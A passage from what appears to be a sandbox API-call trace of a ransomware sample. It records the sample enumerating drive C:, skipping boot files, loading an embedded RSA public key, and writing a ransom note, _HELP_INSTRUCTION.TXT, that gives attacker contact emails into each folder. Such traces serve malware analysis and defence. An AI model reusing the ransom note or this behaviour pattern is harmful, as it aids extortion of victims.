MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0031.898] lstrcpyW (in: lpString1=0x1800fc, lpString2="BOOTSECT.BAK" | out: lpString1="BOOTSECT.BAK") returned="BOOTSECT.BAK" [0031.898] lstrcpyW (in: lpString1=0x17fcfc, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0031.898] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17fafc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x360 [0031.899] Sleep (dwMilliseconds=0x96) [0032.085] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.085] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.085] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.085] lstrcmpW (lpString1="hiberfil.sys", lpString2="..") returned 1 [0032.085] lstrcmpW (lpString1="hiberfil.sys", lpString2=".") returned 1 [0032.085] StrStrW (lpFirst="hiberfil.sys", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0032.085] StrStrW (lpFirst="hiberfil.sys", lpSrch="ntldr") returned 0x0 [0032.085] StrStrW (lpFirst="hiberfil.sys", lpSrch="NTLDR") returned 0x0 [0032.085] StrStrW (lpFirst="hiberfil.sys", lpSrch="NTDETECT.COM") returned 0x0 [0032.085] StrStrW (lpFirst="hiberfil.sys", lpSrch="ntdetect.com") returned 0x0 [0032.085] StrStrW (lpFirst="C:\\", lpSrch="Desktop") returned 0x0 [0032.085] StrStrW (lpFirst="C:\\", lpSrch="DESKTOP") returned 0x0 [0032.085] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\") returned 7 [0032.085] lstrcpyA (in: lpString1=0x17fafc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0032.085] lstrcpyW (in: lpString1=0x1800fc, lpString2="hiberfil.sys" | out: lpString1="hiberfil.sys") returned="hiberfil.sys" [0032.085] lstrcpyW (in: lpString1=0x17fcfc, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0032.085] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17fafc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x304 [0032.086] Sleep (dwMilliseconds=0x96) [0032.241] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.241] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.241] lstrcmpW (lpString1="pagefile.sys", lpString2="..") returned 1 [0032.241] lstrcmpW (lpString1="pagefile.sys", lpString2=".") returned 1 [0032.241] StrStrW (lpFirst="pagefile.sys", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0032.241] StrStrW (lpFirst="pagefile.sys", lpSrch="ntldr") returned 0x0 [0032.241] StrStrW (lpFirst="pagefile.sys", lpSrch="NTLDR") returned 0x0 [0032.241] StrStrW (lpFirst="pagefile.sys", lpSrch="NTDETECT.COM") returned 0x0 [0032.241] StrStrW (lpFirst="pagefile.sys", lpSrch="ntdetect.com") returned 0x0 [0032.241] StrStrW (lpFirst="C:\\", lpSrch="Desktop") returned 0x0 [0032.241] StrStrW (lpFirst="C:\\", lpSrch="DESKTOP") returned 0x0 [0032.242] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\") returned 7 [0032.242] lstrcpyA (in: lpString1=0x17fafc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0032.242] lstrcpyW (in: lpString1=0x1800fc, lpString2="pagefile.sys" | out: lpString1="pagefile.sys") returned="pagefile.sys" [0032.242] lstrcpyW (in: lpString1=0x17fcfc, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0032.242] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17fafc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x328 [0032.242] Sleep (dwMilliseconds=0x96) [0032.397] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.397] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.397] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.397] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.397] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.397] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.397] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.397] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.397] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 0 [0032.397] FindClose (in: hFindFile=0x324478 | out: hFindFile=0x324478) returned 1 [0032.397] FindClose (in: hFindFile=0x324478 | out: hFindFile=0x324478) returned 0 [0032.398] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:" | out: lpString1="C:") returned="C:" [0032.398] lstrcatW (in: lpString1="C:", lpString2="\\*.*" | out: lpString1="C:\\*.*") returned="C:\\*.*" [0032.398] StrStrW (lpFirst="C:\\", lpSrch="Desktop") returned 0x0 [0032.398] StrStrW (lpFirst="C:\\", lpSrch="DESKTOP") returned 0x0 [0032.398] SetErrorMode (uMode=0x1) returned 0x1 [0032.398] wsprintfW (in: param_1=0x17f6bc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\_HELP_INSTRUCTION.TXT") returned 24 [0032.398] GetUserNameW (in: lpBuffer=0x17d498, pcbBuffer=0x17d284 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17d284) returned 1 [0032.398] wsprintfW (in: param_1=0x17d290, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0032.398] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17d28c | out: phkResult=0x17d28c*=0x2a0) returned 0x0 [0032.398] RegQueryValueExW (in: hKey=0x2a0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x348e28, lpcbData=0x17d288*=0x104 | out: lpType=0x0, lpData=0x348e28*=0x65, lpcbData=0x17d288*=0x4a) returned 0x0 [0032.399] RegCloseKey (hKey=0x2a0) returned 0x0 [0032.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17e6bc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0032.399] wsprintfW (in: param_1=0x17d6bc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0032.399] CreateFileW (lpFileName="C:\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.399] CreateFileW (lpFileName="C:\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0032.399] WriteFile (in: hFile=0x2a0, lpBuffer=0x17d6bc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17d6b4, lpOverlapped=0x0 | out: lpBuffer=0x17d6bc*, lpNumberOfBytesWritten=0x17d6b4*=0x2c4, lpOverlapped=0x0) returned 1 [0032.400] CloseHandle (hObject=0x2a0) returned 1 [0032.400] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 0x324478 [0032.400] PathFindFileNameW (pszPath="C:") returned="C:" [0032.400] lstrcpyW (in: lpString1=0x17f8c4, lpString2="C:" | out: lpString1="C:") returned="C:" [0032.400] lstrcmpW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0032.401] lstrcmpW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0032.401] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0032.401] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0032.401] lstrcatW (in: lpString1="C:\\", lpString2="$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0032.401] SetErrorMode (uMode=0x1) returned 0x1 [0032.401] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0032.401] lstrcatW (in: lpString1="C:\\$Recycle.Bin", lpString2="\\" | out: lpString1="C:\\$Recycle.Bin\\") returned="C:\\$Recycle.Bin\\" [0032.401] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\$Recycle.Bin\\" | out: lpString1="C:\\$Recycle.Bin\\") returned="C:\\$Recycle.Bin\\" [0032.401] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="*.*" | out: lpString1="C:\\$Recycle.Bin\\*.*") returned="C:\\$Recycle.Bin\\*.*" [0032.401] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.401] PathFindFileNameW (pszPath="C:\\$Recycle.Bin") returned="$Recycle.Bin" [0032.401] lstrcpyW (in: lpString1=0x17e824, lpString2="$Recycle.Bin" | out: lpString1="$Recycle.Bin") returned="$Recycle.Bin" [0032.401] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.401] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0032.401] lstrcatW (in: lpString1="C:\\$Recycle.Bin", lpString2="\\*.*" | out: lpString1="C:\\$Recycle.Bin\\*.*") returned="C:\\$Recycle.Bin\\*.*" [0032.401] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="Desktop") returned 0x0 [0032.401] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="DESKTOP") returned 0x0 [0032.401] SetErrorMode (uMode=0x1) returned 0x1 [0032.401] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\$Recycle.Bin\\_HELP_INSTRUCTION.TXT") returned 37 [0032.402] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0032.402] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0032.402] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x2f8) returned 0x0 [0032.402] RegQueryValueExW (in: hKey=0x2f8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3ddc6a0, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3ddc6a0*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0032.402] RegCloseKey (hKey=0x2f8) returned 0x0 [0032.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0032.402] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0032.402] CreateFileW (lpFileName="C:\\$Recycle.Bin\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\$recycle.bin\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.402] CreateFileW (lpFileName="C:\\$Recycle.Bin\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\$recycle.bin\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f8 [0032.403] WriteFile (in: hFile=0x2f8, lpBuffer=0x17c61c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17c614, lpOverlapped=0x0 | out: lpBuffer=0x17c61c*, lpNumberOfBytesWritten=0x17c614*=0x2c4, lpOverlapped=0x0) returned 1 [0032.404] CloseHandle (hObject=0x2f8) returned 1 [0032.404] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.404] PathFindFileNameW (pszPath="C:\\$Recycle.Bin") returned="$Recycle.Bin" [0032.404] lstrcpyW (in: lpString1=0x17e824, lpString2="$Recycle.Bin" | out: lpString1="$Recycle.Bin") returned="$Recycle.Bin" [0032.404] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.404] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.404] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.404] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0032.404] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0032.404] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0032.404] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0032.404] lstrcatW (in: lpString1="C:\\", lpString2="Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot" [0032.404] SetErrorMode (uMode=0x1) returned 0x1 [0032.404] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot" [0032.404] lstrcatW (in: lpString1="C:\\Boot", lpString2="\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0032.405] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0032.405] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="*.*" | out: lpString1="C:\\Boot\\*.*") returned="C:\\Boot\\*.*" [0032.405] FindFirstFileW (in: lpFileName="C:\\Boot\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.405] PathFindFileNameW (pszPath="C:\\Boot") returned="Boot" [0032.405] lstrcpyW (in: lpString1=0x17e824, lpString2="Boot" | out: lpString1="Boot") returned="Boot" [0032.405] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.405] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot" [0032.405] lstrcatW (in: lpString1="C:\\Boot", lpString2="\\*.*" | out: lpString1="C:\\Boot\\*.*") returned="C:\\Boot\\*.*" [0032.405] StrStrW (lpFirst="C:\\Boot\\", lpSrch="Desktop") returned 0x0 [0032.405] StrStrW (lpFirst="C:\\Boot\\", lpSrch="DESKTOP") returned 0x0 [0032.405] SetErrorMode (uMode=0x1) returned 0x1 [0032.405] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Boot\\_HELP_INSTRUCTION.TXT") returned 29 [0032.405] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0032.405] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0032.405] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x2f8) returned 0x0 [0032.406] RegQueryValueExW (in: hKey=0x2f8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3dd7488, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3dd7488*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0032.406] RegCloseKey (hKey=0x2f8) returned 0x0 [0032.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0032.406] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0032.406] CreateFileW (lpFileName="C:\\Boot\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\boot\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.406] CreateFileW (lpFileName="C:\\Boot\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\boot\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f8 [0032.406] WriteFile (in: hFile=0x2f8, lpBuffer=0x17c61c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17c614, lpOverlapped=0x0 | out: lpBuffer=0x17c61c*, lpNumberOfBytesWritten=0x17c614*=0x2c4, lpOverlapped=0x0) returned 1 [0032.407] CloseHandle (hObject=0x2f8) returned 1 [0032.407] FindFirstFileW (in: lpFileName="C:\\Boot\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.407] PathFindFileNameW (pszPath="C:\\Boot") returned="Boot" [0032.407] lstrcpyW (in: lpString1=0x17e824, lpString2="Boot" | out: lpString1="Boot") returned="Boot" [0032.407] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.407] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.407] FindNextFileW (in: hFindFile=0x324478, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0032.407] lstrcmpW (lpString1="Config.Msi", lpString2="..") returned 1 [0032.407] lstrcmpW (lpString1="Config.Msi", lpString2=".") returned 1 [0032.407] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0032.407] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0032.407] lstrcatW (in: lpString1="C:\\", lpString2="Config.Msi" | out: lpString1="C:\\Config.Msi") returned="C:\\Config.Msi" [0032.407] SetErrorMode (uMode=0x1) returned 0x1 [0032.408] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Config.Msi" | out: lpString1="C:\\Config.Msi") returned="C:\\Config.Msi" [0032.408] lstrcatW (in: lpString1="C:\\Config.Msi", lpString2="\\" | out: lpString1="C:\\Config.Msi\\") returned="C:\\Config.Msi\\" [0032.408] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Config.Msi\\" | out: lpString1="C:\\Config.Msi\\") returned="C:\\Config.Msi\\" [0032.408] lstrcatW (in: lpString1="C:\\Config.Msi\\", lpString2="*.*" | out: lpString1="C:\\Config.Msi\\*.*") returned="C:\\Config.Msi\\*.*" [0032.408] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3243f8 [0032.408] PathFindFileNameW (pszPath="C:\\Config.Msi") returned="Config.Msi" [0032.408] lstrcpyW (in: lpString1=0x17e824, lpString2="Config.Msi" | out: lpString1="Config.Msi") returned="Config.Msi" [0032.408] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0032.408] FindNextFileW (in: hFindFile=0x3243f8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0 [0032.408] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 1 [0032.408] FindClose (in: hFindFile=0x3243f8 | out: hFindFile=0x3243f8) returned 0 [0032.408] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Config.Msi" | out: lpString1="C:\\Config.Msi") returned="C:\\Config.Msi" [0032.408] lstrcatW (in: lpString1="C:\\Config.Msi", lpString2="\\*.*" | out: lpString1="C:\\Config.Msi\\*.*") returned="C:\\Config.Msi\\*.*" [0032.408] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="Desktop") returned 0x0 [0032.408] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="DESKTOP") returned 0x0 [0032.408] SetErrorMode (uMode=0x1) returned 0x1 [0032.409] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Config.Msi\\_HELP_INSTRUCTION.TXT") returned 35 [0032.409] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0032.409] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 